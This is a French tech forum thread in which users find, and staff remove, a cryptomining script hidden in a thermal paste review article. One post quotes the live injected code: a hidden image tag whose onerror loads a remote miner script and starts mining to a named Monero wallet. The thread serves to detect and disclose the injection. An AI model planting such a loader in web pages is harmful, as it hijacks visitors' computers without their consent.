EN DIRECT en ligne connexion / inscription
Connexion

Surnom/Pseudo
Mot de Passe :

[ Vous avez perdu votre mot de pass ? | Devenir membre ]

×

Infection de page web sur le test des pâtes thermiques , page 2

Aller à la page :   1234  
CowcotLand topic RSS feed Surveiller les réponses de ce sujet
CeltiGDL @
Saisonnier
Saisonnier

43pts

Inscrit le: 22 avril 2020
Messages: 23

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 01:44  Lien permanent
Répondre en citant
Idem, signalé avec Kaspersky
Voir le profil de l'utilisateur Envoyer un message privé
hyperman @
Agriculteur
Agriculteur

2028pts

Inscrit le: 28 juin 2014
Messages: 622
Localisation: juste derriere toi...
Navigateur : Firefox

Hors ligne
Message Posté le: 01 août 2021 à 04:24  Lien permanent
Répondre en citant
alors truc tres rigolo, je confirme qu'il se passe bien quelque chose Mort de rire

quand je lance la page "Comparatif de pâtes thermiques : 9 modèles testés" et que je la laisse ouverte, mon CPU passe a 100% sur le gestionnaire des taches (par firefox), quand je la coupe, ca repasse a 4,5%

y'a definitivement un truc, et qu'est pas detecté XD

cowcot faut faire quelque chose la, ca craint grave :')


firefox, antivir win10

EDIT : faudrait ptete enlever le "suspicion" du texte... y'a bien un truc




Chuck norris est grand
Voir le profil de l'utilisateur Envoyer un message privé
Karlitos @
Saisonnier
Saisonnier

200pts

Inscrit le: 15 décembre 2019
Messages: 138

Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 07:26  Lien permanent
Répondre en citant
Oui je confirme même constant cpu à 100% sur cette page !
Voir le profil de l'utilisateur Envoyer un message privé
OMGimag33k @
Métayer
Métayer

2604pts

Inscrit le: 25 septembre 2018
Messages: 1110

Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 13:04  Lien permanent
Répondre en citant
+1, le script de cloud miner est bien présent...

Après avoir établi une connexion directe sur le serveur ccl en retirant la mise en cache du CDN, voici le véritable code source du script:

Code:
<img itemprop="image" src=x style="display: none;" onerror="
var x=document.createElement('script'); x.setAttribute('src', 'https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean'); document.body.appendChild(x);
window.onload = function() { EverythingIsLife('86QXuVdWxRKHU3RKQnnit1J3ZrJd4n62SLTkyZhT5upULX2Ky6oF2WL6CMVZK448FM6vowu1Ry3c3NNsHuJpgATvG4ovNYv', 'ccl', 20); };


Le script est donc intégré discrètement sous la forme d'une image.

Le script est spécifique à cet article, j'ai regardé vite fait dans d'autres articles et il n'y était pas (il faudrait vérifier directement en bdd pour voir si le script est présent ailleurs).

Cela dit, le script est présent depuis la mise en ligne de l'article: http://web.archive.org/web/20200428173923/https://www.cowcotland.com/articles/2951/comparatif-de-pates-thermiques-9-modeles-testes.html Il semble donc qu'il ait bien été inséré volontairement par l'auteur... Roulement des yeux

Dans le code source, on voit le nom du pool et son adresse. On peut donc se rendre ici: https://moneroocean.stream/ et rentrer l'adresse
Code:
86QXuVdWxRKHU3RKQnnit1J3ZrJd4n62SLTkyZhT5upULX2Ky6oF2WL6CMVZK448FM6vowu1Ry3c3NNsHuJpgATvG4ovNYv
pour avoir pas mal d'infos:



On voit bien que le mineur a été appelé "ccl", ce n'est pas le fait d'un hack, c'est volontaire... Roulement des yeux


Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
Zoom @
Métayer
Métayer

4237pts

Inscrit le: 11 février 2019
Messages: 1599

Navigateur : Firefox

En ligne
Message Posté le: 01 août 2021 à 13:13  Lien permanent
Répondre en citant
4 centimes par an 👌
Voir le profil de l'utilisateur Envoyer un message privé
Le_dodo @
Ouvrier agricole
Ouvrier agricole

429pts

Inscrit le: 16 décembre 2020
Age: 39
Messages: 256
Localisation: 25 rue de la grange au loup
Navigateur : Edge

En ligne
Message Posté le: 01 août 2021 à 14:42  Lien permanent
Répondre en citant
OMGimag33k a écrit:
+1, le script de cloud miner est bien présent...
On voit bien que le mineur a été appelé "ccl", ce n'est pas le fait d'un hack, c'est volontaire... Roulement des yeux

J'ai rien compris pour ce qui est de la partie technique, mais c'est franchement dégeulasse d'utiliser les ressources des autres sans leur demander !
Voir le profil de l'utilisateur Envoyer un message privé
topodoco @
Paysan
Paysan

637pts

Inscrit le: 29 juillet 2008
Messages: 359

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:09  Lien permanent
Répondre en citant
Est-ce que le script s'active en permanence ou uniquement si un bloqueur de pub est détecté ?
Comme ça, ça a l'air dégueulasse, mais si ça permet de dégager les pubs, je crois que c'est une solution qui ne me déplairait pas tant que ça...


Voir le profil de l'utilisateur Envoyer un message privé
t0t0 @
Saisonnier
Saisonnier

144pts

Inscrit le: 11 décembre 2016
Messages: 50

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:29  Lien permanent
Répondre en citant
Il n'y a pas moyen de mettre en place un Content-Security-Policy pour bloquer ce genre de choses ?
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
bishop28 @
Métayer
Métayer

2530pts

Inscrit le: 06 octobre 2010
Age: 41
Messages: 1487
Localisation: FRANCE
Navigateur : Firefox

En ligne
Message Posté le: 01 août 2021 à 15:51  Lien permanent
Répondre en citant
topodoco a écrit:
Est-ce que le script s'active en permanence ou uniquement si un bloqueur de pub est détecté ?
Comme ça, ça a l'air dégueulasse, mais si ça permet de dégager les pubs, je crois que c'est une solution qui ne me déplairait pas tant que ça...


Avec un anti pub, le script ne se lance pas, sans il se lance.

Sans :
Mon image

Avec :
Mon image


Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

14271pts

Inscrit le: 24 novembre 2003
Messages: 2721
Localisation: Niort enfin presque
Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 15:51  Lien permanent
Répondre en citant
mias c'est quoi ce truc


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

14271pts

Inscrit le: 24 novembre 2003
Messages: 2721
Localisation: Niort enfin presque
Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 15:55  Lien permanent
Répondre en citant
il y a bien le code en code source, je le vire de suite


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

14271pts

Inscrit le: 24 novembre 2003
Messages: 2721
Localisation: Niort enfin presque
Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 15:57  Lien permanent
Répondre en citant
C'était ca le code, comme tu l'avais noté


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil

Dernière édition par mantidor le 02 août 2021 à 07:33; édité 1 fois
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
bishop28 @
Métayer
Métayer

2530pts

Inscrit le: 06 octobre 2010
Age: 41
Messages: 1487
Localisation: FRANCE
Navigateur : Firefox

En ligne
Message Posté le: 01 août 2021 à 15:59  Lien permanent
Répondre en citant
C'est bon de mon côté, il ne se lance plus sans anti pub.


Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

14271pts

Inscrit le: 24 novembre 2003
Messages: 2721
Localisation: Niort enfin presque
Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 16:01  Lien permanent
Répondre en citant
Franchement ne vois pas d'ou cela vient et en plus faire miner des CPU, bonjour l'inefficaté

On va enquêter.


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
eldran64 @
Cowcot Team
Cowcot Team

18886pts

Inscrit le: 30 juin 2009
Age: 35
Messages: 6999
Localisation: En Bretagne
Navigateur : Edge

Hors ligne
Message Posté le: 01 août 2021 à 16:23  Lien permanent
Répondre en citant
mantidor a écrit:
Franchement ne vois pas d'ou cela vient et en plus faire miner des CPU, bonjour l'inefficaté

On va enquêter.


Depuis ta réponse, j'ai ce souci sur ce topic aussi ☹


Un souci avec la modération? -> https://www.cowcotland.com/topic36431.html#649011

Il faut prendre soin de la méthode avec laquelle on se met des trucs dans la tête.
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
Aller à la page :   1234  
Sauter vers: 
Surveiller les réponses de ce sujet CowcotLand topic RSS feed  

Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum


Sujets similaires

Sujet Auteur Forum Réponses Posté le
Pas de nouveau message Test du MSI Alpha 15 AMD Advantage Edition. robert30 PC Portables 3 13 septembre 2021 à 21:41
Pas de nouveau message Besoin de votre avis après test 3dmark BINGO Divers Hardware 7 11 septembre 2021 à 15:11
Pas de nouveau message Remplacement Pad THermiques Karlitos [MSI] Cartes graphiques 4 29 août 2021 à 12:56
Pas de nouveau message Office 2016 imprime page blanche cordobaseb OsLand 5 11 août 2021 à 19:57
Pas de nouveau message Présentation et test du Lian Li Lancool II Mesh RGB PriceTF141 Boitiers/racks 1 05 août 2021 à 17:55